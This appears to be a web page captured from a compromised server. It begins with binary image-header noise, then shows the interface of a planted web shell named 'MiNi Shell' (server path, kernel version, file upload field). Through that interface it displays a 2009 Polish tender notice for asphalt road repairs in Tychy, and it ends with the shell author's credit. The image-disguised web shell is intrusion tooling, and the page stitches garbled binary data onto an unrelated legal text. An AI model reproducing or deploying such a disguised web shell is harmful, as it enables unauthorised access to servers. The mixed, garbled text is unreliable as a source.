JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090924/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090924/163257-N-2009.html

<p class="kh_header"><b>Tychy: Remont nawierzchni asfaltowych dróg wewnętrznych oraz chodników.</b><br>
<b>Numer ogłoszenia: 163257 - 2009; data zamieszczenia: 24.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont nawierzchni asfaltowych dróg wewnętrznych oraz chodników..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są roboty budowlane w zakresie remontu nawierzchni 
      asfaltowych dróg wewnętrznych oraz chodników w Tychach przy nieruchomościach 
      administrowanych przez:
      - Rejon Obsługi Mieszkańców Nr I: 
      przy Pl. Św. Anny 2-2a, ul. Andersa 2a, 4a, ul. Arkadowej 3, 3b, ul. Wojska Polskiego 1b,
      3a, ul. Arkadowej 2a i Arctowskiego 3
      - Rejon Obsługi Mieszkańców Nr III:
      przy Al. Niepodległości 2-12, Al. Bielskiej 69-87, ul. Skłodowskiej 9-11, ul. Cyganerii 37-47, 
      ul. Ejsmonda 9-11, ul. Elfów 1-3, al. Niepodległości 28-34, ul. Grota Roweckiego 46-60, 
      al. Niepodległości 31-33
      - Rejon Obsługi Mieszkańców Nr IV:
      przy ul. Wyszyńskiego (Kaskada), ul. De Gaullea 26-28, ul. Dębowej 42-44, 
      ul. Dąbrowskiego 23-25, ul. Darwina 2-8, ul. Dębowej 18-20, ul. Dębowej 10-14, 
      ul. Grota Roweckiego 57-69, ul. Dębowej 26-28, ul. Dąbrowskiego 11-13, 
      ul.  Dębowej 34-36, ul. Dąbrowskiego 17-19
      - Rejon Obsługi Mieszkańców Nr V: 
      przy ul. Czarnieckiego 6, ul. Czereśniowej 1-3, ul. Budowlanych 67, ul. Budowlanych 41
      - dyrekcję Miejskiego Zarządu Budynków Mieszkalnych: przy ul. Filaretów 31

2.    Zakres robót obejmuje m.in.:
    
      - rozebranie istniejących nawierzchni asfaltowych
      - wymiana obrzeży
      	- uzupełnienie podbudowy 
     	- wykonanie nowych nawierzchni
      - wywóz i utylizacja gruzu 

       Szczegółowy zakres robót określają przedmiary robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.31.40-2, 45.23.31.42-6, 45.11.12.20-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium o wartości:  4 600,00 zł  
     (słownie: cztery tysiące sześćset złotych - na czas związania ofertą).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> I. Warunki udziału w postępowaniu i sposób dokonywania ich oceny:    
1. O zamówienie mogą ubiegać się Wykonawcy którzy spełniają warunki określone na podstawie art. 22 ust.1 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych (tekst jednolity Dz. U. z 20 listopada 2007 r., Nr 223, poz. 1655, ze zm.), tj.:  
a)  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy
      nakładają obowiązek posiadania takich uprawnień; 
b)  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym  
     i osobami zdolnymi do wykonania zamówienia lub  przedstawią pisemne zobowiązanie 
     innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do 
     wykonania zamówienia; 
 c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;    
 d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia; 
      oraz spełnią warunki określone w specyfikacji istotnych warunków zamówienia. 

      ZAMAWIAJĄCY WYMAGA, ABY WYKONAWCA WYKAZAŁ, ŻE:

1)	dysponuje lub będzie dysponował osobą / osobami zdolnymi do wykonania zamówienia, 
       w szczególności uprawnionymi do sprawowania samodzielnych funkcji technicznych 
       w budownictwie w specjalnościach niezbędnych do wykonania robót budowlanych (art. 12
       i 13 ustawy z dnia 7 lipca 1994 r. - Prawo Budowlane (Dz. U. z 2006 r. Nr 156, poz. 118  
       ze zm.), którzy są  członkami Polskiej  Izby Inżynierów Budownictwa (art. 6 ustawy z dnia 
       15 grudnia 2000 r. o samorządach  zawodowych, architektów, inżynierów budowlanych
       i Urbanistów, Dz. U. z 2001 r. Nr 5, poz. 42  z późn. zm.), tj.: osobą / osobami 
       posiadającymi uprawnienia budowlane w specjalności drogowej lub konstrukcyjno - 
       budowlanej. 

2)   w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia  
      publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał
      z należytą starannością co najmniej dwie roboty odpowiadające swoim rodzajem i wartością 
      robotom budowlanym stanowiącym przedmiot zamówienia, tj. należy wykazać co najmniej 
      d w i e  roboty  wykonane w  ramach odrębnych umów, polegające na wykonaniu     
      nawierzchni asfaltowych o powierzchni każdej z tych robót nie mniejszej niż 600 m2 
      o wartości każdej z tych robót nie mniejszej niż 90 000,00 zł (brutto).
 
3)  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
     gospodarczej - o wartości ubezpieczenia nie mniejszej niż 150 000,00 zł. 

2.  Sprawdzenie spełnienia warunków udziału w postępowaniu zostanie dokonane na podstawie 
     złożonego oświadczenia oraz dołączonych do oferty dokumentów wymienionych w punkcie II niniejszego rozdziału według zasady spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.  Wykonawca wraz z ofertą składa następujące oświadczenia i dokumenty: 

  1)  oświadczenie potwierdzające spełnienie warunku udziału w postępowaniu 
        stosownie do treści art. 44 w związku z art. 22 ust. 1 pkt. 1÷ 4  ustawy - Pzp. 
       - wzór druku oświadczenia stanowi załącznik do specyfikacji,

       (W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia                
        oświadczenie o spełnianiu warunków udziału w postępowaniu składają wszyscy Wykonawcy)

  2)  aktualny odpis z właściwego rejestru (KRS) albo aktualne zaświadczenie o wpisie do 
       ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru 
       lub zgłoszenia do ewidencji działalności gospodarcze - wystawiony  nie wcześniej 
       niż 6 miesięcy przed upływem terminu składania ofert;  

3)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz 
     właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia 
       Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem 
       podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, 
       że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych 
       płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych 
       nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;

                (W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia 
       przedmiotowe dokumenty wymienione w punkcie 2) i 3) muszą być złożone dla każdego z nich).

4)  aktualną polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca
      jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
      - o wartości ubezpieczenia nie mniejszej niż 150 000,00 zł;

    Kwotę ubezpieczenia wyrażoną w  innej walucie niż PLN, Zamawiający przeliczy na PLN,
    przyjmując do przeliczeń średni kurs danej waluty podany w dniu otwarcia ofert przez
    Narodowy Bank Polski.
    (W przypadku podmiotów występujących wspólnie warunek ten Zamawiający uzna za spełniony, jeżeli  
    Wykonawcy składający ofertę wspólną będą spełniać go łącznie lub co najmniej jeden z Wykonawców)  
 
5)  wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem 
     wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres działalności jest 
     krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym 
     stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania 
    - w którym należy wykazać: co najmniej d w i e  roboty  wykonane w  ramach odrębnych 
     umów, polegające na wykonaniu nawierzchni asfaltowych o powierzchni każdej z tych robót 
     nie mniejszej niż 600 m2 o wartości każdej z tych robót nie mniejszej niż 90 000,00 zł 
     (brutto) oraz załączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie.

     Wykaz wykonanych robót budowlanych o charakterze podobnym do przedmiotu zamówienia należy sporządzić wg wzoru druku stanowiącego załącznik do SIWZ. 

- W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać łącznie lub co najmniej jeden z Wykonawców

6)  kserokopię uprawnień budowlanych w specjalności drogowej lub konstrukcyjno - 
     budowlanej, oraz aktualne zaświadczenia z właściwej Izby Inżynierów Budownictwa.  

      Ocena spełnienia ww. warunków zostanie dokonana zgodnie z formułą spełnia / nie spełnia.

2.  Stosownie do treści § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. 
     (Dz. U. Nr 87, poz. 605, z późn. zm. ) w sprawie rodzajów dokumentów potwierdzających 
     spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich 
     może żądać Zamawiający od Wykonawcy:
1)  jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej  
     Polskiej, zamiast dokumentów, o których mowa powyżej w pkt. 1., p.pkt. 2) i 3) - składa 
     dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce 
     zamieszkania, potwierdzające odpowiednio, że:  
     a)  nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
     b)  nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i 
          zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie 
          na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego 
          organu;  
2)  jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub 
     miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie w pkt. 1.,
     p.pkt. 2) i 3) zastępuje się je dokumentem zawierającym oświadczenie złożone przed 
     notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu 
     zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym 
     Wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.umtychy.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego - pokój Nr 20, cena 17 zł (brutto) lub za 
zaliczeniem pocztowym. Opłata dotyczy wykonawców, którzy odbiorą SIWZ osobiście lub złożą wniosek o jej przekazanie..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2009 godzina 11:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach,
SEKRETARIAT -  pokój nr 15,  43-100 Tychy, ul. Filaretów 31.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com